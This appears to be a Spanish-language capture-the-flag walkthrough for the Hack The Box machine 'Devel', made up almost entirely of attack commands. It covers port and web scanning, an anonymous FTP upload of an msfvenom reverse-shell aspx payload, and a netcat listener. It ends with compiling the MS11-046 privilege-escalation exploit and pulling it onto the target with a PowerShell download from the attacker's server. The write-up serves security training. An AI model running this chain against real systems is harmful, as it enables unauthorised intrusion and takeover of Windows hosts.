echo "10.129.140.124 devel.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.140.124 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210423190315.png

nmap -sC -sV -O -p- -oA devel 10.129.140.124

nmap -sU -O -p- -oA devel-udp 10.129.140.124

nikto -h 10.129.138.158:80

Pasted image 20210304210150.png

gobuster dir -k -u http://devel.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210423190546.png

   anonymous
   put bar.txt

Pasted image 20210423191030.png

msfvenom --list payloads | grep windows
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=3333 -f aspx > shell.aspx

Pasted image 20210423191401.png

   bin
   put shell.aspx

Para poder ejecutarlo, hacemos un curl al script recién subido.

curl http://devel.htb/shell.aspx

Pasted image 20210423191555.png

nc -lvnp 3333

whoami /priv

Pasted image 20210423192052.png

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe > reverse.exe

Pasted image 20210423193443.png

cd c:\users
dir

systeminfo

Pasted image 20210423193838.png

Buscamos el exploit de MS11-046 y vemos que el EDB-ID es 40564.

# actualizar searchsploit para conseguir lo más nuevo
searchsploit -u

searchsploit -m 40564

apt-get update
apt-get install mingw-w64

Compilamos el exploit de acuerdo con las instrucciones de Exploit-DB.

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Pasted image 20210423200140.png

python3 -m http.server 8888

La máquina de Windows no tiene netcat, pero sí tiene PowerShell.

cd Public\Downloads

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.18:8888/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

dir

Pasted image 20210423200916.png

   whoami

Pasted image 20210423201048.png

